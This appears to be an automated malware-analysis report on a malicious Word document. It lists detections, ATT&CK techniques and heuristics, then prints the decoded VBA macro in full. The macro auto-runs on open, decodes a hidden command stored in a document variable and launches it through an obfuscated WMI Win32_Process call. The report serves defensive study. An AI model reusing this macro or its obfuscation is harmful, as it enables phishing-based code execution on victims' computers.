MALICIOUS
402
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is an OOXML document containing a VBA macro that is automatically executed via the Document_Open subroutine. The macro uses WMI (Win32_Process.Create) to launch a process, likely to download and execute a second-stage payload. The obfuscation technique of reassembling the 'winmgmts' string from split literals is noted. The document body explicitly prompts the user to enable macros, indicating a social engineering lure.
Heuristics 9
-
ClamAV: Doc.Downloader.Sagent-9376492-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sagent-9376492-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3371 bytes |
SHA-256: ada61f6647b7f1f14cbaa1223e86498d76acd97f59057002e8b097ced078d78a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Sub Competent(ByVal Haleakala As String)
Dim Cannikin As Long: Dim Hidrosis() As Byte
GoTo Unfestooned
BrownsBurg:
NoNapparitioNal StrConv(Hidrosis, 64, 1055)
Exit Sub
Eximiously:
For Cannikin = 0 To UBound(Hidrosis)
Hidrosis(Cannikin) = Abs(Hidrosis(Cannikin) - 15)
Next
GoTo BrownsBurg
Exit Sub
Unfestooned:
Hidrosis = StrConv(Haleakala, 128, 1055)
GoTo Eximiously
Exit Sub
End Sub
Sub Document_Open()
Call ImItatIonal
End Sub
Private Sub ImItatIonal()
Dim Haleakala As String: Haleakala = ActiveDocument.Variables("v91bbc112ea").Value
Competent Haleakala
End Sub
Private Sub NoNapparitioNal(ByVal RadiogRaphy As String)
Dim Lankiest As String: Lankiest = "."
If RadiogRaphy <> "" Then
GetObject("w" & "i" & "n" & "m" & "gm" & "t" & "s" & ":\\" & Lankiest & "\ro" & "ot\ci" & "m" & "v2" & ":W" & "in3" & "2_P" & "r" & "oc" & "e" & "s" & "s").Create RadiogRaphy, Null, Null, 0
Else
MsgBox "Promted usr764 ."
GetObject("wi" & "n" & "m" & "g" & "mt" & "s:\\" & "." & "\ro" & "ot\ci" & "mv2" & ":W" & "in" & "3" & "2" & "_P" & "roc" & "e" & "ss").Create "calc.exe", Null, Null, 0
End If
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 13824 bytes |
SHA-256: de9a096ac134c1e3b78445724bf4df319578b9626fe221e5d4b6515cfdc55d71 |
|||
|
Detection
ClamAV:
Doc.Downloader.Sagent-9376492-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.